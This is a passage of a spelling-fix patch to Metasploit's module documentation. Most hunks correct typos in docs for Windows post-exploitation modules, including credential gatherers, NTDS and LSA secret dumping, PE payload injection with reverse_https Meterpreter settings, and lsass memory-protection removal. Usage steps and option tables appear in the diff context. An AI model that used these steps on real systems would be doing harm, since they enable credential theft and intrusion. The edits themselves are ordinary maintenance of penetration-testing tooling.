SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` diff --git a/documentation/modules/post/windows/gather/credentials/srware.md b/documentation/modules/post/windows/gather/credentials/srware.md index 0a1dc7325015..f78af96c61be 100644 --- a/documentation/modules/post/windows/gather/credentials/srware.md +++ b/documentation/modules/post/windows/gather/credentials/srware.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` diff --git a/documentation/modules/post/windows/gather/credentials/tango.md b/documentation/modules/post/windows/gather/credentials/tango.md index 4716148847cf..875aa1e645fd 100644 --- a/documentation/modules/post/windows/gather/credentials/tango.md +++ b/documentation/modules/post/windows/gather/credentials/tango.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` diff --git a/documentation/modules/post/windows/gather/credentials/thunderbird.md b/documentation/modules/post/windows/gather/credentials/thunderbird.md index 246edaf1bec9..f6a765f687f4 100644 --- a/documentation/modules/post/windows/gather/credentials/thunderbird.md +++ b/documentation/modules/post/windows/gather/credentials/thunderbird.md @@ -25,10 +25,10 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/tlen.md b/documentation/modules/post/windows/gather/credentials/tlen.md index d8fd4f7fe556..b702db32f5d2 100644 --- a/documentation/modules/post/windows/gather/credentials/tlen.md +++ b/documentation/modules/post/windows/gather/credentials/tlen.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file diff --git a/documentation/modules/post/windows/gather/credentials/viber.md b/documentation/modules/post/windows/gather/credentials/viber.md index 99c3bd379d62..17d4e49d8f38 100644 --- a/documentation/modules/post/windows/gather/credentials/viber.md +++ b/documentation/modules/post/windows/gather/credentials/viber.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/windowslivemail.md b/documentation/modules/post/windows/gather/credentials/windowslivemail.md index dddd0254fe64..4373c623676f 100644 --- a/documentation/modules/post/windows/gather/credentials/windowslivemail.md +++ b/documentation/modules/post/windows/gather/credentials/windowslivemail.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file diff --git a/documentation/modules/post/windows/gather/credentials/xchat.md b/documentation/modules/post/windows/gather/credentials/xchat.md index 76dc481c874f..3fd8d0f6576e 100644 --- a/documentation/modules/post/windows/gather/credentials/xchat.md +++ b/documentation/modules/post/windows/gather/credentials/xchat.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md b/documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md index b3e9d55d30ea..d49673a6f7a4 100644 --- a/documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md +++ b/documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md @@ -2,7 +2,7 @@ Fanny or DWE for short. (DWE = DementiaWheel) Detection module based on the `post/windows/gather/forensics/duqu_check` module. Fanny is a worm that infects windows -machines, via USB (not trough Autorun, or at least not only). +machines, via USB (not through Autorun, or at least not only). In fact, it used exploits later found in StuxNet. It creates creates some Registry artifacts. diff --git a/documentation/modules/post/windows/gather/lsa_secrets.md b/documentation/modules/post/windows/gather/lsa_secrets.md index ed1918982df1..2dcbfb16f9cd 100644 --- a/documentation/modules/post/windows/gather/lsa_secrets.md +++ b/documentation/modules/post/windows/gather/lsa_secrets.md @@ -17,7 +17,7 @@ This module will attempt to enumerate the LSA Secrets keys within the registry. ### STORE If the decrypted values should be stored in the database. This is a tradeoff since there is no way to tell if a decrypted -value is a legitamate password, thus you may fill your database with bad values. Default is `true`. +value is a legitimate password, thus you may fill your database with bad values. Default is `true`. ## Scenarios diff --git a/documentation/modules/post/windows/gather/make_csv_orgchart.md b/documentation/modules/post/windows/gather/make_csv_orgchart.md index 76b83136e8a2..7b46f77a4b8e 100644 --- a/documentation/modules/post/windows/gather/make_csv_orgchart.md +++ b/documentation/modules/post/windows/gather/make_csv_orgchart.md @@ -28,7 +28,7 @@ Option | Value -------------------| --- ACTIVE_USERS_ONLY | This will restrict the search for users to those whose accounts are Active. This would have the effect of excluding disabled accounts (e.g. employees who have resigned). FILTER | Any additional LDAP filtering that is required when searching for users. -WITH_MANAGERS_ONLY | If this is TRUE, the module will only include users who have a manger set (internally, this is implemented by adding (manager=*) to the ADSI query filter). This could be useful if not everyone has a manager set, but could mean that the top executive is not included either. +WITH_MANAGERS_ONLY | If this is TRUE, the module will only include users who have a manager set (internally, this is implemented by adding (manager=*) to the ADSI query filter). This could be useful if not everyone has a manager set, but could mean that the top executive is not included either. STORE_LOOT | Store the results in a CSV file in loot. You'll almost certainly want this set to TRUE. # Demo diff --git a/documentation/modules/post/windows/gather/ntds_grabber.md b/documentation/modules/post/windows/gather/ntds_grabber.md index a0ca4b9601c1..702591856edb 100644 --- a/documentation/modules/post/windows/gather/ntds_grabber.md +++ b/documentation/modules/post/windows/gather/ntds_grabber.md @@ -1,6 +1,6 @@ ## Creating A Testing Environment To use this module you need an meterpreter on a domain controller. - The meterpreter has to have SYSTEM priviliges. + The meterpreter has to have SYSTEM privileges. Powershell has te be installed. This module has been tested against: @@ -15,7 +15,7 @@ This module was not tested against, but may work against: 1. Start msfconsole 2. Obtain a meterpreter session with a meterpreter via whatever method. - 3. Ensure the metepreter has SYSTEM priviliges. + 3. Ensure the metepreter has SYSTEM privileges. 4. Ensure powershell is installed. 3. Do: 'use post/windows/gather/ntds_grabber ' 4. Do: 'set session #' diff --git a/documentation/modules/post/windows/manage/dell_memory_protect.md b/documentation/modules/post/windows/manage/dell_memory_protect.md index 153995c08b46..bbffd407962a 100644 --- a/documentation/modules/post/windows/manage/dell_memory_protect.md +++ b/documentation/modules/post/windows/manage/dell_memory_protect.md @@ -52,11 +52,11 @@ in the scenarios below, the driver files are uploaded to `C:\Windows\Temp`, so t ### ENABLE_MEM_PROTECT -Enable or disable memory protection on the targetted process. `false` will remove memory protection and `true` will enable it. +Enable or disable memory protection on the targeted process. `false` will remove memory protection and `true` will enable it. ### PID -The ID of the targetted process. If set to 0 (the default value), the module will automatically find lsass.exe. +The ID of the targeted process. If set to 0 (the default value), the module will automatically find lsass.exe. ## Verification Steps @@ -158,7 +158,7 @@ Module options (post/windows/manage/dell_memory_protect): ---- --------------- -------- ----------- DRIVER_PATH yes The path containing the driver inf, cat, and sys (and coinstaller) ENABLE_MEM_PROTECT false yes Enable or disable memory protection - PID yes The targetted process + PID yes The targeted process SESSION yes The session to run this module on msf6 post(windows/manage/dell_memory_protect) > set SESSION 1 diff --git a/documentation/modules/post/windows/manage/execute_dotnet_assembly.md b/documentation/modules/post/windows/manage/execute_dotnet_assembly.md index 31e3c02a135f..ba8765e46c1f 100644 --- a/documentation/modules/post/windows/manage/execute_dotnet_assembly.md +++ b/documentation/modules/post/windows/manage/execute_dotnet_assembly.md @@ -22,7 +22,7 @@ You'll find details at [Execute assembly via Meterpreter session](https://b4rtik ### Example 1: Run within the same process 1. Build or download a .NET project - 1. Buid project with target framework that is present on the host + 1. Build project with target framework that is present on the host 1. Start msfconsole 1. Do: ```use post/windows/manage/execute_dotnet_assembly``` 1. Do: ```set SESSION sessionid``` @@ -79,7 +79,7 @@ msf5 post(windows/manage/execute_dotnet_assembly) > run ## Example 2: Run in existing process 1. Build or download a .NET project - 1. Buid project with target framework that is present on the host + 1. Build project with target framework that is present on the host 1. Start msfconsole 1. Do: ```use post/windows/manage/execute_dotnet_assembly``` 1. Do: ```set SESSION sessionid``` @@ -93,7 +93,7 @@ msf5 post(windows/manage/execute_dotnet_assembly) > run ## Example 3: Run in new process 1. Build or download a .NET project - 1. Buid project with target framework that is present on the host + 1. Build project with target framework that is present on the host 1. Start msfconsole 1. Do: ```use post/windows/manage/execute_dotnet_assembly``` 1. Do: ```set SESSION sessionid``` diff --git a/documentation/modules/post/windows/manage/hashcarve.md b/documentation/modules/post/windows/manage/hashcarve.md index 593c660f3bc9..f369bf1ce2ba 100644 --- a/documentation/modules/post/windows/manage/hashcarve.md +++ b/documentation/modules/post/windows/manage/hashcarve.md @@ -20,7 +20,7 @@ Here is the process that the module follows: - write they user key back into the registry ## Recommandations -I would recommand to use hashdump before using the module to backup the user hashes +I would recommend to use hashdump before using the module to backup the user hashes Use at your own risk. ## Limitations diff --git a/documentation/modules/post/windows/manage/peinjector.md b/documentation/modules/post/windows/manage/peinjector.md index 2ff83e5759ab..7bd7e3ec5e6a 100644 --- a/documentation/modules/post/windows/manage/peinjector.md +++ b/documentation/modules/post/windows/manage/peinjector.md @@ -7,7 +7,7 @@ as a thread within the process with the same privs. LHOST IP of host that will receive the connection from the payload. LPORT Port for Payload to connect to. OPTIONS Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. -PAYLOAD Windows Payload to inject into the targer executable. +PAYLOAD Windows Payload to inject into the target executable. SESSION The session to run this module on. TARGETPE Path of the target executable to Path of the target executable to be injected @@ -59,7 +59,7 @@ Module options (post/windows/manage/peinjector): LHOST yes IP of host that will receive the connection from the payload. LPORT 4433 no Port for Payload to connect to. OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. - PAYLOAD windows/meterpreter/reverse_https no Windows Payload to inject into the targer executable. + PAYLOAD windows/meterpreter/reverse_https no Windows Payload to inject into the target executable. SESSION yes The session to run this module on. TARGETPE no Path of the target executable to be injected @@ -82,7 +82,7 @@ Module options (post/windows/manage/peinjector): LHOST 192.168.135.111 yes IP of host that will receive the connection from the payload. LPORT 4561 no Port for Payload to connect to. OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. - PAYLOAD windows/x64/meterpreter/reverse_https no Windows Payload to inject into the targer executable. + PAYLOAD windows/x64/meterpreter/reverse_https no Windows Payload to inject into the target executable. SESSION 1 yes The session to run this module on. TARGETPE C:\users\msfuser\downloads\puttyx64.exe no Path of the target executable to be injected diff --git a/documentation/modules/post/windows/manage/priv_migrate.md b/documentation/modules/post/windows/manage/priv_migrate.md index 36d8a15b4dd5..b83087901441 100644 --- a/documentation/modules/post/windows/manage/priv_migrate.md +++ b/documentation/modules/post/windows/manage/priv_migrate.md @@ -14,7 +14,7 @@ This module is a nice addition to the beginning of an autorun script for post-Me - **ANAME** - This option allows you to specify a system level process that the module attempts to migrate to first if the session has admin rights. - **NAME** - This option allows you to specify the user level process that the module attempts to migrate to first if the session has user rights or if admin migration fails through all of the default processes. - **KILL** - This option allows you to kill the original process after a successful migration. The default value is FALSE. -- **NOFAIL** - This option allows you to specify whether or not the module will migrate the session into a user level process if admin level migration fails. If TRUE, this may downgrade priviliged shells. The default value is FALSE. +- **NOFAIL** - This option allows you to specify whether or not the module will migrate the session into a user level process if admin level migration fails. If TRUE, this may downgrade privileged shells. The default value is FALSE. ## Module Process Here is the process that the module follows: From 7ffc1ca491f43d5bfd2da8053bd0759f5bf0971c Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 11 Oct 2023 06:30:11 -0400 Subject: [PATCH 2/2] undo some spelling fixes when upstream has those issues --- documentation/modules/exploit/linux/samba/is_known_pipename.md | 2 +- documentation/modules/exploit/multi/http/magento_unserialize.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/samba/is_known_pipename.md b/documentation/modules/exploit/linux/samba/is_known_pipename.md index 4ef19bfe5258..0757631b876e 100644 --- a/documentation/modules/exploit/linux/samba/is_known_pipename.md +++ b/documentation/modules/exploit/linux/samba/is_known_pipename.md @@ -18,7 +18,7 @@ where no SMB options are required to be set: comment = CVE-2017-7494 path = /tmp writable = yes -browsable = yes +browseable = yes guest ok = yes ``` diff --git a/documentation/modules/exploit/multi/http/magento_unserialize.md b/documentation/modules/exploit/multi/http/magento_unserialize.md index 572e263f1a52..43ad2331c2f9 100644 --- a/documentation/modules/exploit/multi/http/magento_unserialize.md +++ b/documentation/modules/exploit/multi/http/magento_unserialize.md @@ -68,7 +68,7 @@ If at some point the IP (base URL) of Magento has changed, then you will need to 1. From the terminal, do: ```mysql -h localhost -u [username] -p[password]``` 2. In the SQL prompt, do: ```use [magento database name]``` -3. Do: ```select * from core_config_data;```, you should see both web/insecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP. +3. Do: ```select * from core_config_data;```, you should see both web/unsecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP. 4. Do: ```update core_config_data set value='http://[IP]/' where config_id=2;``` 5. Do: ```update core_config_data set value='https://[IP]/' where config_id=3;``` 6. Back to the Magento directory, do: ```sudo rm -rf var/cache/*```